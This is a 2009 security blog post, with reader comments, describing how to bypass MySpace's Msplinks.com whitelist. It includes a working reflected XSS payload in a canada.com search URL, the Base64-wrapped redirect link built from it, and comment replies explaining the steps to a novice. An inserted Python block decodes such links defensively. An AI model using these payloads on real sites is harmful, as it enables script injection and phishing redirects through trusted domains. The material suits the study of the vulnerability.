This site is soon to be deprecated by http://www.johnleitch.net

Sunday, October 4, 2009

Bypassing Msplinks.com Revisited - Myspace.com

The technique I previously blogged about still works, but ytmnd.com has fixed the XSS vulnerability used in that posting. Here's a hole in another Msplinks.com whitelisted site:

http://www.canada.com/search/search.html?q=')}window.location='http://cross-site-scripting.blogspot.com/';{('

Just as before, 01 is prefixed to the XSS redirect URL; the result is then Base64 encoded and appended to http://www.msplinks.com/.

http://www.msplinks.com/MDFodHRwOi8vd3d3LmNhbmFkYS5jb20vc2VhcmNoL3NlYXJjaC5odG1sP3E9Jyl9d2luZG93LmxvY2F0aW9uPSdodHRwOi8vY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuYmxvZ3Nwb3QuY29tLyc7eygn
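As an added example (not code from the post), here is the scheme described above run in reverse as an audit step: decode a wrapped link, recover the real target, and flag a query string that carries script metacharacters. SAMPLE_WRAPPED is the link quoted above; the SUSPICIOUS heuristic and the benign sample URL are my own assumptions. It also makes the defensive point concrete: the host is all a whitelist checks, while the payload lives in the query.

```python
import base64
import re
from typing import Optional
from urllib.parse import urlparse, unquote

# Wrapping scheme as the post describes it: "01" + target URL, Base64-encoded,
# appended to the redirector host.
REDIRECTOR = "http://www.msplinks.com/"

# The wrapped link quoted in the post (the only page-supplied sample).
SAMPLE_WRAPPED = REDIRECTOR + "MDFodHRwOi8vd3d3LmNhbmFkYS5jb20vc2VhcmNoL3NlYXJjaC5odG1sP3E9Jyl9d2luZG93LmxvY2F0aW9uPSdodHRwOi8vY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuYmxvZ3Nwb3QuY29tLyc7eygn"

# Heuristic (my own assumption, not from the post): script metacharacters or
# DOM/navigation tokens inside a query string or fragment are a red flag.
SUSPICIOUS = re.compile(r"""['"<>{}()]|\bwindow\.|\bdocument\.|javascript:""", re.I)


def wrap(target: str) -> str:
    """Build a wrapped link with the scheme the post describes (used for the benign sample)."""
    return REDIRECTOR + base64.b64encode(("01" + target).encode()).decode()


def unwrap(wrapped: str) -> Optional[str]:
    """Recover the embedded target, or None if the link is not a well-formed wrap."""
    if not wrapped.startswith(REDIRECTOR):
        return None
    try:
        decoded = base64.b64decode(wrapped[len(REDIRECTOR):], validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):  # bad alphabet or padding, or non-UTF-8 bytes
        return None
    if not decoded.startswith("01"):
        return None
    return decoded[2:]


def audit(wrapped: str) -> dict:
    """Report where a wrapped link really lands and whether its query looks like a payload."""
    target = unwrap(wrapped)
    if target is None:
        return {"valid": False, "host": None, "target": None, "suspicious": False}
    parts = urlparse(target)
    # Percent-decode first so an escaped payload is inspected in the clear.
    tail = unquote(parts.query) + " " + unquote(parts.fragment)
    return {
        "valid": True,
        "host": parts.hostname,      # this is all a host whitelist ever sees
        "target": target,
        "suspicious": bool(SUSPICIOUS.search(tail)),
    }
```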

5 comments:

  1. If you could tell us noobs what you said, then I'd be happy.

  2. Sure thing. What are you hung up on?

  3. "01 is prefixed to the XSS redirect URL"

    Not really sure what this means, as I'm new to the java world. I've seen how XSS affects sites when scripts are placed into search bars, but to redirect using whitelisted sites, tough.

    "the result is Base64 encoded and appended"

    I'm guessing after encoding we add the code to Msplinks.com/

    I'm stuck at the first part.

  4. It's pretty simple. In this example you would base64 encode 01http://www.canada.com/search/search.html?q=')}window.location='http://cross-site-scripting.blogspot.com/';{('

    And you have step two correct.

  5.
    I like this post,
    although I haven't studied this, I love writing code and learning about information technology.
